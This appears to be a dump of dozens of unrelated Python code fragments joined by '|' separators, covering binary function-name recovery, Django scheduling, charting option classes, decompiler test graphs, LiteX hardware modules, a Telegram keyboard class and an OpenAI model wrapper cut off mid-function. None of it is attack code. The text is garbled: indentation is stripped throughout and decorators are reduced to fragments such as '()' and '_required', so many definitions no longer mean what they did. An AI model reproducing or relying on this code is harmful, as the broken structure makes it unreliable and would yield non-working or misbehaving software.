_start = functions.get_function_by_lowpc(functions.binary.entry_point)
_start.name = '_start'
_start.train_name = '_start'
_start.test_name = '_start'
_start.is_name_given = True
_start.is_run_init = False
for blk_bap in _start.bap.blks:
stmts = blk_bap.stmts
for i in range((len(stmts) - 1), (- 1), (- 1)):
stmt = stmts[i]
if (isinstance(stmt, JmpStmt) and isinstance(stmt.kind, CallKind) and isinstance(stmt.kind.target, DirectLabel)):
target_tid = stmt.kind.target.target_tid
called_f = functions.get_function_by_tid(target_tid)
if ((called_f is not None) and (called_f.name == '__libc_start_main') and (i > 0)):
main_pc = None
init_pc = None
fini_pc = None
fini_reg = None
for j in range((i - 2), (- 1), (- 1)):
stmt = stmts[j]
if isinstance(stmt, DefStmt):
if (isinstance(stmt.lhs, RegVar) and (stmt.lhs.name == 'R0') and isinstance(stmt.rhs, IntExp) and functions.is_lowpc_function(stmt.rhs.value) and (main_pc is None)):
main_pc = stmt.rhs.value
main = functions.get_function_by_lowpc(main_pc)
if (functions.binary.config.MODE == functions.binary.config.TEST):
main.name = 'main'
main.train_name = 'main'
main.test_name = 'main'
main.is_name_given = True
main.is_run_init = True
elif (isinstance(stmt.lhs, RegVar) and (stmt.lhs.name == 'R3') and isinstance(stmt.rhs, IntExp) and functions.is_lowpc_function(stmt.rhs.value) and (init_pc is None)):
init_pc = stmt.rhs.value
init = functions.get_function_by_lowpc(init_pc)
init.name = '__libc_csu_init'
init.train_name = '__libc_csu_init'
init.test_name = '__libc_csu_init'
init.is_name_given = True
init.is_run_init = False
elif (isinstance(stmt.lhs, MemVar) and isinstance(stmt.rhs, StoreExp) and isinstance(stmt.rhs.exp, IntExp) and functions.is_lowpc_function(stmt.rhs.exp.value) and (fini_pc is None)):
fini_pc = stmt.rhs.exp.value
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False
elif (isinstance(stmt.lhs, MemVar) and isinstance(stmt.rhs, StoreExp) and isinstance(stmt.rhs.exp, RegVar) and (fini_pc is None) and (fini_reg is None)):
fini_reg = (stmt.rhs.exp.name, stmt.rhs.exp.index)
elif (isinstance(stmt.lhs, RegVar) and isinstance(stmt.rhs, IntExp) and functions.is_lowpc_function(stmt.rhs.value) and (fini_pc is None) and (fini_reg is not None) and (fini_reg == (stmt.lhs.name, stmt.lhs.index))):
fini_pc = stmt.rhs.value
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False |
class _ScheduleModel(models.Model):
PT = PeriodicTask
_active = None
_schedule = None
periodic_task = models.ForeignKey(PT, null=True, blank=True)
class Meta():
app_label = 'vms'
abstract = True
def _new_periodic_task(self):
return NotImplemented
def _save_crontab(self, c):
(c.minute, c.hour, c.day_of_month, c.month_of_year, c.day_of_week) = self.schedule.split()
c.save()
return c
def crontab_to_schedule(c):
def s(f):
return ((f and str(f).replace(' ', '')) or '*')
return ('%s %s %s %s %s' % (s(c.minute), s(c.hour), s(c.day_of_month), s(c.month_of_year), s(c.day_of_week)))
def active(self):
if (self._active is None):
if self.periodic_task:
self._active = self.periodic_task.enabled
else:
self._active = True
return self._active
def active(self, value):
self._active = value
def schedule(self):
if ((self._schedule is None) and self.periodic_task and self.periodic_task.crontab):
self._schedule = self.crontab_to_schedule(self.periodic_task.crontab)
return self._schedule
def schedule(self, value):
self._schedule = value
def save(self, *args, **kwargs):
super(_ScheduleModel, self).save(*args, **kwargs)
do_save = False
pt = self.periodic_task
if (not pt):
pt = self._new_periodic_task()
if (not pt.crontab):
pt.crontab = self._save_crontab(CrontabSchedule())
do_save = True
elif (self.schedule != self.crontab_to_schedule(pt.crontab)):
self._save_crontab(pt.crontab)
do_save = True
if (self.active != pt.enabled):
pt.enabled = self.active
do_save = True
if (not pt.pk):
pt.save()
self.periodic_task = pt
self.save(update_fields=('periodic_task',))
elif do_save:
pt.save(update_fields=('enabled', 'crontab', 'date_changed'))
def post_delete_schedule(sender, instance, **kwargs):
if instance.periodic_task:
if instance.periodic_task.crontab:
instance.periodic_task.crontab.delete()
else:
instance.periodic_task.delete() |
class UserLeadGenDisclaimerResponse(AbstractObject):
def __init__(self, api=None):
super(UserLeadGenDisclaimerResponse, self).__init__()
self._isUserLeadGenDisclaimerResponse = True
self._api = api
class Field(AbstractObject.Field):
checkbox_key = 'checkbox_key'
is_checked = 'is_checked'
_field_types = {'checkbox_key': 'string', 'is_checked': 'string'}
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
class PreconditioningProgram(object):
swagger_types = {}
attribute_map = {}
def __init__(self):
self.discriminator = None
def to_dict(self):
result = {}
for (attr, _) in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map((lambda x: (x.to_dict() if hasattr(x, 'to_dict') else x)), value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map((lambda item: ((item[0], item[1].to_dict()) if hasattr(item[1], 'to_dict') else item)), value.items()))
else:
result[attr] = value
if issubclass(PreconditioningProgram, dict):
for (key, value) in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if (not isinstance(other, PreconditioningProgram)):
return False
return (self.__dict__ == other.__dict__)
def __ne__(self, other):
return (not (self == other)) |
class OptionSeriesNetworkgraphSonificationContexttracksMappingGapbetweennotes(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def walk(st, lex, rule=None):
(tok, children) = st
if (tok == pgen.PgenParser.RULE):
rule = children[0][0]
nodes.add(rule)
for child in children[1:]:
walk(child, lex, rule)
elif (isinstance(tok, str) and tok.strip() and (tok[0] in string.ascii_lowercase)):
nodes.add(tok)
if (rule is not None):
edges.add((rule, tok))
else:
for child in children:
walk(child, lex, rule) |
class RawType(BaseType):
def __init__(self, cstruct, name=None, size=0):
self.name = name
self.size = size
super().__init__(cstruct)
def __len__(self):
return self.size
def __repr__(self):
if self.name:
return self.name
return BaseType.__repr__(self)
def _read(self, stream):
raise NotImplementedError()
def _read_0(self, stream):
raise NotImplementedError()
def _write(self, stream, data):
raise NotImplementedError()
def _write_0(self, stream, data):
raise NotImplementedError()
def default(self):
raise NotImplementedError() |
class OptionSeriesColumnpyramidSonification(Options):
def contextTracks(self) -> 'OptionSeriesColumnpyramidSonificationContexttracks':
return self._config_sub_data('contextTracks', OptionSeriesColumnpyramidSonificationContexttracks)
def defaultInstrumentOptions(self) -> 'OptionSeriesColumnpyramidSonificationDefaultinstrumentoptions':
return self._config_sub_data('defaultInstrumentOptions', OptionSeriesColumnpyramidSonificationDefaultinstrumentoptions)
def defaultSpeechOptions(self) -> 'OptionSeriesColumnpyramidSonificationDefaultspeechoptions':
return self._config_sub_data('defaultSpeechOptions', OptionSeriesColumnpyramidSonificationDefaultspeechoptions)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def pointGrouping(self) -> 'OptionSeriesColumnpyramidSonificationPointgrouping':
return self._config_sub_data('pointGrouping', OptionSeriesColumnpyramidSonificationPointgrouping)
def tracks(self) -> 'OptionSeriesColumnpyramidSonificationTracks':
return self._config_sub_data('tracks', OptionSeriesColumnpyramidSonificationTracks) |
()
def graph_no_dependency(variable_x, variable_u, variable_v, aliased_variable_y, variable_x_new, variable_u_new, variable_v_new, aliased_variable_y_new) -> Tuple[(List[BasicBlock], List[Instruction], ControlFlowGraph)]:
instructions = [Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant()])), Phi(variable_x[3], [variable_x[2], variable_x[4]]), Phi(variable_v[2], [variable_v[1], variable_v[3]]), Phi(variable_u[2], [variable_u[1], variable_u[3]]), Phi(aliased_variable_y[4], [aliased_variable_y[3], aliased_variable_y[5]]), Assignment(variable_u[3], aliased_variable_y[4]), Branch(Condition(OperationType.less_or_equal, [variable_v[2], variable_u[3]], CustomType('bool', 1))), Assignment(variable_x[4], variable_v[2]), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(), variable_x[4]]))]
nodes = [BasicBlock(i) for i in range(10)]
nodes[0].instructions = [instructions[0]]
nodes[1].instructions = instructions[1:7]
nodes[2].instructions = instructions[7:9]
instructions[1]._origin_block = {nodes[0]: variable_x[2], nodes[2]: variable_x[4]}
instructions[2]._origin_block = {nodes[0]: variable_v[1], nodes[2]: variable_v[3]}
instructions[3]._origin_block = {nodes[0]: variable_u[1], nodes[2]: variable_u[3]}
instructions[4]._origin_block = {nodes[0]: aliased_variable_y[3], nodes[2]: aliased_variable_y[5]}
cfg = ControlFlowGraph()
cfg.add_edges_from([UnconditionalEdge(nodes[0], nodes[1]), UnconditionalEdge(nodes[2], nodes[1])])
new_instructions = [Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant()])), Phi(variable_x_new[3], [variable_x_new[2], variable_x_new[4]]), Phi(variable_v_new[2], [variable_v_new[1], variable_v_new[3]]), Phi(variable_u_new[2], [variable_u_new[1], variable_u_new[3]]), Phi(aliased_variable_y_new[4], [aliased_variable_y_new[3], aliased_variable_y_new[5]]), Assignment(variable_u_new[3], aliased_variable_y_new[4]), Branch(Condition(OperationType.less_or_equal, [variable_v_new[2], variable_u_new[3]], CustomType('bool', 1))), Assignment(variable_x_new[4], variable_v_new[2]), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(), variable_x_new[4]]))]
new_instructions[1]._origin_block = {nodes[0]: variable_x_new[2], nodes[2]: variable_x_new[4]}
new_instructions[2]._origin_block = {nodes[0]: variable_v_new[1], nodes[2]: variable_v_new[3]}
new_instructions[3]._origin_block = {nodes[0]: variable_u_new[1], nodes[2]: variable_u_new[3]}
new_instructions[4]._origin_block = {nodes[0]: aliased_variable_y_new[3], nodes[2]: aliased_variable_y_new[5]}
return (nodes, new_instructions, cfg) |
_required
_required
_required(ImageAdminPermission)
_required(ImageImportAdminPermission)
def imagestore_list(request, repo=None):
user = request.user
context = collect_view_data(request, 'dc_image_list')
context['image_vm'] = ImageVm.get_uuid()
context['is_staff'] = is_staff = user.is_staff
context['all'] = _all = (is_staff and request.GET.get('all', False))
context['qs'] = qs = get_query_string(request, all=_all).urlencode()
context['url_form_admin'] = reverse('admin_image_form', query_string=qs)
context['form_admin'] = AdminImageForm(request, None, prefix='adm', initial={'owner': user.username, 'access': Image.PRIVATE, 'dc_bound': True})
qs_image_filter = request.GET.copy()
qs_image_filter.pop('created_since', None)
qs_image_filter.pop('last', None)
context['qs_image_filter'] = qs_image_filter.urlencode()
context['default_limit'] = default_limit = 30
context['image_uuids'] = set(Image.objects.all().values_list('uuid', flat=True))
try:
created_since_days = int(request.GET.get('created_since', 0))
except (ValueError, TypeError):
created_since_days = None
if created_since_days:
limit = None
else:
created_since_days = None
try:
limit = int(request.GET.get('last', default_limit))
except (ValueError, TypeError):
limit = default_limit
repositories = ImageStore.get_repositories(include_image_vm=request.user.is_staff)
context['imagestores'] = imagestores = ImageStore.all(repositories)
context['created_since'] = created_since_days
context['limit'] = limit
if repositories:
if (repo and (repo in repositories)):
context['imagestore'] = imagestore = ImageStore(repo, url=repositories[repo])
else:
context['imagestore'] = imagestore = imagestores[0]
if created_since_days:
created_since = make_aware((datetime.now() - timedelta(days=created_since_days)))
else:
created_since = None
context['images'] = imagestore.images_filter(created_since=created_since, limit=limit)
else:
context['imagestore'] = None
context['images'] = []
return render(request, 'gui/dc/imagestore_list.html', context) |
(name=MAX_PATH_EXT_RTFILTER_ALL)
def validate_max_path_ext_rtfilter_all(max_path_ext_rtfilter_all):
if (not isinstance(max_path_ext_rtfilter_all, bool)):
raise ConfigTypeError(desc=('Invalid max_path_ext_rtfilter_all configuration value %s' % max_path_ext_rtfilter_all))
return max_path_ext_rtfilter_all |
class OptionPlotoptionsPyramid3dSonificationContexttracksPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
def resample_to_native(native_mesh, dest_mesh, settings, subject_id, sphere, expected_labels, reg_sphere_mesh):
copy_sphere_mesh_from_template(settings, dest_mesh)
resample_surfs_and_add_to_spec(subject_id, native_mesh, dest_mesh, current_sphere=sphere, current_sphere_mesh=reg_sphere_mesh)
make_inflated_surfaces(subject_id, dest_mesh, iterations_scale=0.75)
add_dense_maps_to_spec_file(subject_id, dest_mesh, settings.dscalars.keys(), expected_labels) |
class TestEnabledApisScannerTest():
.e2e
.scanner
.server
.skip(reason='Flaky test, sometimes no violation is found.')
def test_enabled_apis_scanner(self, cloudsql_connection, forseti_scan_readonly, project_id):
(scanner_id, scanner_result) = forseti_scan_readonly
violation_type = 'ENABLED_APIS_VIOLATION'
violation_rule_name = 'Restrict Compute Engine API'
assert scanner_id
regex = re.compile('EnabledApisScanner')
match = regex.search(str(scanner_result.stdout))
assert match
regex = re.compile('Scan completed')
match = regex.search(str(scanner_result.stdout))
assert match
query = text('SELECT COUNT(*) FROM forseti_security.violations V WHERE V.scanner_index_id = :scanner_id AND V.resource_id = :project_id AND V.rule_name = :violation_rule_name AND V.violation_type = :violation_type')
violation_count = cloudsql_connection.execute(query, project_id=project_id, scanner_id=scanner_id, violation_rule_name=violation_rule_name, violation_type=violation_type).fetchone()
assert (1 == violation_count[0]) |
class TestAction(ActionBase):
def ban(self, aInfo):
self._logSys.info('ban ainfo %s, %s, %s, %s', (aInfo['ipmatches'] != ''), (aInfo['ipjailmatches'] != ''), (aInfo['ipfailures'] > 0), (aInfo['ipjailfailures'] > 0))
self._logSys.info('jail info %d, %d, %d, %d', aInfo['jail.banned'], aInfo['jail.banned_total'], aInfo['jail.found'], aInfo['jail.found_total'])
def unban(self, aInfo):
pass |
def calc_clip_factor(clipping_value: float, norm: float) -> float:
if ((clipping_value < 0) or (norm < 0)):
raise ValueError('Error: max_norm and per_user_norm must be both positive.')
clip_factor = (clipping_value / (norm + __EPS__))
clip_factor = min(clip_factor, 1.0)
return clip_factor |
def get_numeric_gradient(predict, n, target):
gradient = numpy.zeros(n)
for i in range(n):
out1 = predict(i, 0.0001)
out2 = predict(i, (- 0.0001))
err1 = _get_loss(out1, target)
err2 = _get_loss(out2, target)
gradient[i] = ((err1 - err2) / (2 * 0.0001))
print('NGrad', i, err1, err2)
return gradient |
('rocm.bert_embeddings.gen_function')
def bert_embeddings_gen_function(func_attrs: Dict[(str, Any)]) -> str:
backend_spec = ROCMSpec()
elem_input_type = backend_spec.dtype_to_lib_type(func_attrs['inputs'][3]._attrs['dtype'])
(input_ids, token_type_ids, position_ids, word_embeddings, token_type_embeddings, position_embeddings, gamma, beta) = func_attrs['inputs']
embedding_dim = word_embeddings._size((- 1)).value()
dtype = python_int_dtype_to_c_dtype(func_attrs['inputs'][0]._attrs['dtype'])
return FUNC_TEMPLATE.render(index_type=dtype, elem_input_type=elem_input_type, embedding_dim=embedding_dim, row_v_size=math.gcd(8, (embedding_dim // 256)), func_signature=FUNC_SIGNATURE.render(func_name=func_attrs['name'], index_type=dtype).strip()) |
def test_airflow_dag_get_tasks(airflow_api_tree):
dag_id = 'test_dag'
airflow_api_tree.dag_api.get_tasks.return_value = dict(tasks=[dict(class_ref=dict(module_path='test_module', class_name='test_class'), task_id='test_task_1', downstream_task_ids=[], group_name=None), dict(class_ref=dict(module_path='test_module', class_name='test_class'), task_id='test_task_2', downstream_task_ids=['test_task_1'], group_name=None)])
assert (airflow_api_tree.get_dags(dag_id=dag_id)[0].get_tasks() == [AirflowTask(class_ref=ClassRef(**task['class_ref']), task_id=task['task_id'], downstream_task_ids=task['downstream_task_ids'], group_name=None) for task in airflow_api_tree.dag_api.get_tasks.return_value['tasks']]) |
class AccessManualWebhook(Base):
connection_config_id = Column(String, ForeignKey(ConnectionConfig.id_field_path), unique=True, nullable=False)
connection_config = relationship(ConnectionConfig, back_populates='access_manual_webhook', uselist=False)
fields = Column(MutableList.as_mutable(JSONB), nullable=False)
def fields_schema(self) -> FidesSchema:
class Config():
extra = 'forbid'
field_definitions: Dict[(str, Any)] = {field['dsr_package_label']: (Optional[str], None) for field in (self.fields or [])}
ManualWebhookValidationModel = create_model(__model_name='ManualWebhookValidationModel', __config__=Config, **field_definitions)
return ManualWebhookValidationModel
def erasure_fields_schema(self) -> FidesSchema:
class Config():
extra = 'forbid'
field_definitions: Dict[(str, Any)] = {field['dsr_package_label']: (Optional[bool], None) for field in (self.fields or [])}
ManualWebhookValidationModel = create_model(__model_name='ManualWebhookValidationModel', __config__=Config, **field_definitions)
return ManualWebhookValidationModel
def fields_non_strict_schema(self) -> FidesSchema:
schema: FidesSchema = self.fields_schema
schema.__config__ = BaseConfig
return schema
def erasure_fields_non_strict_schema(self) -> FidesSchema:
schema: FidesSchema = self.erasure_fields_schema
schema.__config__ = BaseConfig
return schema
def empty_fields_dict(self) -> Dict[(str, None)]:
return {key: None for key in (self.fields_schema.schema().get('properties') or {}).keys()}
def get_enabled(cls, db: Session, action_type: Optional[ActionType]=None) -> List['AccessManualWebhook']:
query = db.query(cls).filter((AccessManualWebhook.connection_config_id == ConnectionConfig.id), ConnectionConfig.disabled.is_(False), (AccessManualWebhook.fields != text("'null'")), (AccessManualWebhook.fields != '[]'))
if (action_type is not None):
query = query.filter(or_(ConnectionConfig.enabled_actions.contains([action_type]), ConnectionConfig.enabled_actions.is_(None)))
return query.all() |
def _patch_attribute(member: Any, name: str, marker: '_Marker', providers_map: ProvidersMap) -> None:
provider = providers_map.resolve_provider(marker.provider, marker.modifier)
if (provider is None):
return
_patched_registry.register_attribute(PatchedAttribute(member, name, marker))
if isinstance(marker, Provide):
instance = provider()
setattr(member, name, instance)
elif isinstance(marker, Provider):
setattr(member, name, provider)
else:
raise Exception(f'Unknown type of marker {marker}') |
class UnaryOp(expr):
_fields = ('op', 'operand')
_attributes = ('lineno', 'col_offset')
def __init__(self, op, operand, lineno=0, col_offset=0, **ARGS):
expr.__init__(self, **ARGS)
self.op = op
self.operand = operand
self.lineno = int(lineno)
self.col_offset = int(col_offset) |
class KNNRecommender(object):
def __init__(self, k=3, **kwargs):
self.k = k
self.pipeline = Pipeline([('norm', TextNormalizer(minimum=10, maximum=100)), ('tfidf', TfidfVectorizer()), ('knn', Pipeline([('svd', TruncatedSVD(n_components=100)), ('model', KNNTransformer(k=self.k, algorithm='ball_tree'))]))])
self.lex_path = 'lexicon.pkl'
self.vect_path = 'vect.pkl'
self.vectorizer = False
self.lexicon = None
self.load()
def load(self):
if os.path.exists(self.vect_path):
joblib.load(open(self.vect_path, 'rb'))
joblib.load(open(self.lex_path, 'rb'))
else:
self.vectorizer = False
self.lexicon = None
def save(self):
joblib.dump(self.vect, open(self.vect_path, 'wb'))
joblib.dump(self.lexicon, open(self.lex_path, 'wb'))
def fit_transform(self, documents):
if (self.vectorizer == False):
self.lexicon = self.pipeline.fit_transform(documents)
self.vect = self.pipeline.named_steps['tfidf']
self.knn = self.pipeline.named_steps['knn']
self.save()
else:
self.vect = self.vectorizer
self.knn = Pipeline([('svd', TruncatedSVD(n_components=100)), ('knn', KNNTransformer(k=self.k, algorithm='ball_tree'))])
self.knn.fit_transform(self.lexicon)
def recommend(self, terms):
vect_doc = self.vect.transform(wordpunct_tokenize(terms))
distance_matches = self.knn.transform(vect_doc)
matches = distance_matches[0][1][0]
return matches |
class CatchUserErrorTest(TestCase):
_user_error()
def throwsUserError(self):
raise UserError
def testCatchesUserError(self) -> None:
try:
self.throwsUserError()
except UserError:
self.fail('Unexpected UserError')
_user_error()
def throwsException(self):
raise ValueError
def testDoesNotCatchOtherExceptions(self) -> None:
with self.assertRaises(ValueError):
self.throwsException() |
class KeyboardButton(Dictionaryable, JsonSerializable):
def __init__(self, text: str, request_contact: Optional[bool]=None, request_location: Optional[bool]=None, request_poll: Optional[KeyboardButtonPollType]=None, web_app: Optional[WebAppInfo]=None, request_user: Optional[KeyboardButtonRequestUser]=None, request_chat: Optional[KeyboardButtonRequestChat]=None):
self.text: str = text
self.request_contact: bool = request_contact
self.request_location: bool = request_location
self.request_poll: KeyboardButtonPollType = request_poll
self.web_app: WebAppInfo = web_app
self.request_user: KeyboardButtonRequestUser = request_user
self.request_chat: KeyboardButtonRequestChat = request_chat
def to_json(self):
return json.dumps(self.to_dict())
def to_dict(self):
json_dict = {'text': self.text}
if (self.request_contact is not None):
json_dict['request_contact'] = self.request_contact
if (self.request_location is not None):
json_dict['request_location'] = self.request_location
if (self.request_poll is not None):
json_dict['request_poll'] = self.request_poll.to_dict()
if (self.web_app is not None):
json_dict['web_app'] = self.web_app.to_dict()
if (self.request_user is not None):
json_dict['request_user'] = self.request_user.to_dict()
if (self.request_chat is not None):
json_dict['request_chat'] = self.request_chat.to_dict()
return json_dict |
class S2DMA(Module):
def __init__(self, data_width, adr_width, address=0):
self.sink = sink = stream.Endpoint([('data', 8)])
self.source = source = stream.Endpoint([('address', adr_width), ('data', data_width)])
addr = Signal(adr_width, reset=address)
self.comb += [source.data.eq(sink.data), source.address.eq(addr), source.valid.eq(sink.valid), sink.ready.eq(source.ready)]
self.sync += [If((sink.valid & sink.ready), addr.eq((addr + 1)), If(sink.last, addr.eq(address)))] |
class LiteEthEtherboneWishboneMaster(LiteXModule):
def __init__(self):
self.sink = sink = stream.Endpoint(eth_etherbone_mmap_description(32))
self.source = source = stream.Endpoint(eth_etherbone_mmap_description(32))
self.bus = bus = wishbone.Interface()
data_update = Signal()
self.fsm = fsm = FSM(reset_state='IDLE')
fsm.act('IDLE', sink.ready.eq(1), If(sink.valid, sink.ready.eq(0), If(sink.we, NextState('WRITE_DATA')).Else(NextState('READ_DATA'))))
fsm.act('WRITE_DATA', bus.adr.eq(sink.addr), bus.dat_w.eq(sink.data), bus.sel.eq(sink.be), bus.stb.eq(sink.valid), bus.we.eq(1), bus.cyc.eq(1), If((bus.stb & bus.ack), sink.ready.eq(1), If(sink.last, NextState('IDLE'))))
fsm.act('READ_DATA', bus.adr.eq(sink.addr), bus.sel.eq(sink.be), bus.stb.eq(sink.valid), bus.cyc.eq(1), If((bus.stb & bus.ack), data_update.eq(1), NextState('SEND_DATA')))
self.sync += [sink.connect(source, keep={'base_addr', 'addr', 'count', 'be'}), source.we.eq(1), If(data_update, source.data.eq(bus.dat_r))]
fsm.act('SEND_DATA', sink.connect(source, keep={'valid', 'last', 'last_be', 'ready'}), If((source.valid & source.ready), If(source.last, NextState('IDLE')).Else(NextState('READ_DATA')))) |
class DclibOpenAiModel(DcModel):
def __init__(self, model, tokenizer, endpoint=None, **kwargs):
super().__init__(model, tokenizer, truncation_threshold=(- 12000), init_workers=False, **kwargs)
self.mock = kwargs.get('mock', False)
self.output_writer = None
if ('output_writer' in kwargs):
self.output_writer = kwargs['output_writer']
self.model_identifier = ('openai/' + self.model.model_identifier)
if (kwargs.get('openai_chunksize', None) is not None):
warnings.warn("Warning: openai_chunksize is deprecated. Please use 'chunksize' instead.")
kwargs['chunksize'] = kwargs['openai_chunksize']
self.model.chunk_size = kwargs.get('chunksize', (64 if (not self.mock) else 8))
self.model.nostop = kwargs.get('openai_nonstop', False)
self.num_billed_tokens = {}
self.num_requests = 0
kwargs['tokenizer'] = tokenizer
self.api_config = {**({'endpoint': endpoint} if (endpoint is not None) else {}), **kwargs}
self.extra_decoding_parameters = {**({'top_p': kwargs.get('top_p')} if ('top_p' in kwargs) else {}), **({'frequency_penalty': kwargs.get('frequency_penalty')} if ('frequency_penalty' in kwargs) else {}), **({'presence_penalty': kwargs.get('presence_penalty')} if ('presence_penalty' in kwargs) else {})}
if ('top_k' in kwargs):
warnings.warn("'top_k' is not supported by the OpenAI API and will thus be ignored.", openai.OpenAIAPIWarning)
if ('repetition_penalty' in kwargs):
warnings.warn("'repetition_penalty' is not supported by the OpenAI API and will thus be ignored.", openai.OpenAIAPIWarning)
self.timeout = kwargs.get('chunk_timeout', (2.5 if (not self.mock) else 4.5))
self.stats = Stats('openai')
openai.AsyncConfiguration.set_tokenizer(self.tokenize)
assert (not ('hf-' in self.tokenizer.name)), "OpenAI models are not compatible with HuggingFace tokenizers. Please use 'tiktoken' or 'gpt3_tokenizer' instead."
def log_billable_tokens(self, n: int):
pass
def log_queries(self, n: int):
pass
def prepare_completion_call(self, s, mask, sampling_mode, **kwargs):
stopping_phrases = s.data('head').stopping_phrases['text']
if (mask is None):
return CompletionCall('*', None, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
invert = False
num_allowed = masks.mask_num_allowed(mask)
assert (num_allowed > 0), 'DclibOpenAiModel: encountered logits mask with no allowed tokens: mask: {} mask type:{}'.format(mask, type(mask))
if (num_allowed == 1):
token_id = masks.mask_get_only_allowed(mask)
token = self.tokenizer.decode_bytes([token_id])[0]
if masks.mask_is_allowed(mask, self.eos_token_id):
return CompletionCall('fixed', token, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
else:
return CompletionCall('fixed', token, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
elif (num_allowed < self.tokenizer.model_vocab_size):
if ((self.tokenizer.model_vocab_size - num_allowed) > num_allowed):
invert = True
else:
return CompletionCall('*', None, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
return CompletionCall('complete', mask, s.input_ids, kwargs, invert=invert, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
async def api_score(self, input_ids, offset):
if ((len(input_ids) > 0) and (input_ids[0] == self.tokenizer.bos_token_id)):
input_ids = input_ids[1:]
prompt_str = self.tokenizer.convert_bytes_to_string(input_ids)
if ('<|endoftext|>' in prompt_str):
prompt_str = (await self.tokenize(prompt_str))
kwargs = {'model': self.model.model_identifier, 'prompt': prompt_str, 'max_tokens': 0, 'temperature': 0, 'logprobs': 1, 'user': 'lmql', 'echo': True, **({'api_config': self.api_config} if (self.api_config is not None) else {}), 'tracer': active_tracer(), **({'timeout': self.timeout} if (self.timeout is not None) else {})}
logprobs = []
async for data in (await openai.Completion.create(**kwargs)):
logprobs += data['logprobs']['token_logprobs']
logprobs = [(0.0 if (v is None) else v) for v in logprobs]
return np.array(logprobs[offset:], dtype=np.float32)
async def queue_api_score(self, kwargs):
loop = asyncio.get_running_loop()
result_fut = loop.create_future()
self.score_queue.put_nowait((kwargs, result_fut))
return (await result_fut)
async def _score_next_tokens(self, s, next_tokens, noscore=False):
if noscore:
return np.zeros(len(next_tokens), dtype=np.float32)
res = (await self.api_score(np.concatenate([s.input_ids, next_tokens], axis=0), len(s.input_ids)))
server_side_swallowed_tokens = 0
while (len(res) < len(next_tokens)):
res = np.append(res, 0.0)
server_side_swallowed_tokens += 1
if (server_side_swallowed_tokens > 0):
warnings.warn('warning: The OpenAI API has merged {} token(s) server-side, which will reflect in inaccurate 0.0 scores in the decoding tree'.format(server_side_swallowed_tokens))
return res
async def score(self, sqs: List[DecoderSequence], tokens: List[List[bytes]], max_batch_size=4, deterministic: Union[(bool, List[bool])]=False, stop_phrase=False, needs_rewrite=True, user_data=None, noscore=False, internal=False):
assert (len(sqs) == len(tokens)), 'Number of sequences and number of tokens to be scored must match, but got {} and {}'.format(len(sqs), len(tokens))
if (user_data is None):
user_data = {}
user_data['openai-continuations'] = None
def make_detseq(s, token_score, completion):
if (type(deterministic) is bool):
deterministic_flags = np.concatenate([s.deterministic, np.array([deterministic])], dtype=np.bool_)
next_deterministic = np.array(([deterministic] * len(completion[1:])))
else:
assert ((type(deterministic) is list) and (len(deterministic) == len(completion))), 'If deterministic is a list, it must have the same length as the number of tokens to be scored, but is {} and {}'.format(deterministic, completion)
deterministic_flags = np.concatenate([s.deterministic, np.array(deterministic[:1])], dtype=np.bool_)
next_deterministic = np.array(deterministic[1:])
return detseq(ids=np.concatenate([s.input_ids, completion[:1]], axis=0), next_ids=completion[1:], logprobs=np.concatenate([s.logprobs, token_score[:1]], axis=0), next_logprobs=token_score[1:], deterministic=deterministic_flags, next_deterministic=next_deterministic, predecessor=s, user_data=user_data, stop_phrase=np.concatenate([s.stop_phrase, np.array([stop_phrase])]), needs_rewrite=needs_rewrite, sticky_user_data_keys=s.sticky_user_data_keys, internal=internal)
results = []
async for (s, tokens, scores) in self.score_tokens(sqs, tokens, max_batch_size=max_batch_size, noscore=noscore):
results.append(make_detseq(s, scores, tokens))
return results
async def score_tokens(self, sqs: List[DecoderSequence], tokens: List[List[bytes]], max_batch_size=None, noscore=False):
completion = [np.array(cont) for cont in tokens]
for (s, tokens, scores) in zip(sqs, completion, (await asyncio.gather(*(self._score_next_tokens(s, compl, noscore=noscore) for (s, compl) in zip(sqs, completion))))):
(yield (s, tokens, scores))
async def async_complete(self, completion_call: Union[(CompletionCall, List[CompletionCall])], **kwargs) -> openai.response_buffer:
assert (type(completion_call) is CompletionCall)
batch_size = 1
input_ids = completion_call.input_ids.reshape((- 1))
prompt_str = self.tokenizer.convert_bytes_to_string(input_ids)
tokenized_input_ids = (await self.tokenize(prompt_str))
